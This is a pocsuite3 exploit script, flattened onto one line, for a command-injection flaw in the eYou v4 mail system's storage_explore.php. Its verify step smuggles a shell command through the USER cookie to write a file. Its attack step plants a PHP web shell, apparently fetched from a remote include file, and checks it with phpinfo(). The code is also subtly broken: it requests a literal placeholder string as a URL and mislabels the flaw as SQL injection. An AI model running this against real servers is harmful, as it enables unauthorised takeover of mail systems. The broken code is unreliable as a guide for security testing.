eYou v4 /storage_explore.php 命令执行漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout import re class DemoPOC(POCBase): vulID = '1248' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014-04-22' createDate = '2014-04-30' updateDate = '2014-04-30' references = ['http://wooyun.org/bugs/wooyun-2014-058301'] name = 'eYou v4 /storage_explore.php 命令执行漏洞 POC' appPowerLink = 'http://www.eyou.net' appName = 'eYou' appVersion = 'V4#' vulType = 'SQL Injection' desc = ''' eyou邮件系统V4存在一处/user/storage_explore.php页面，该页面调用了 getUserDirPath($uid, $domain)函数，该函数存在的$path = `$cmd`代码 使得CMD控制台可以直接调用。 ''' samples = [] install_requires = [''] def _verify(self): result = {} vul_url_get_shell = '%s/user/storage_explore.php' % self.url match_path = re.compile('eyou_error\(\) in <b>(.*)/list\.php</b> on line') response = requests.get("vul_url_get_path").text path = match_path.findall(response) if path: file_name = random_str(5) headers = {'Cookie': 'USER=UID=1+|echo tEst_bY_360 > %s/%s.txt' % (path[0], file_name)} requests.get(vul_url_get_shell, headers=headers) response = requests.get('%s/user/%s.txt' % (self.url, file_name)).text if 'tEst_bY_360' in response: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url_get_shell result['VerifyInfo']["Postdata"] = repr(headers) return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): php_attack = 'http://pocsuite.org/include_files/php_attack.txt' result = {} vul_url_get_shell = '%s/user/storage_explore.php' % self.url match_path = re.compile('eyou_error\(\) in <b>(.*)/list\.php</b> on line') response = requests.get("vul_url_get_path").text path = match_path.findall(response) if path: file_name = random_str(5) headers = {'Cookie': 'USER=UID=1+|echo %s > %s/%s.php' % (php_attack, path[0], file_name)} requests.get(vul_url_get_shell, headers=headers) shell_url = '%s/user/%s.php' % (self.url, file_name) r = requests.post(shell_url,data="phpinfo();") if r.status_code == 200 and "phpinfo" in r.text: result['ShellInfo'] = {} result['ShellInfo']['URL'] = shell_url result['ShellInfo']['Content'] = requests.get(php_attack).text return self.parse_output(result) register_poc(DemoPOC)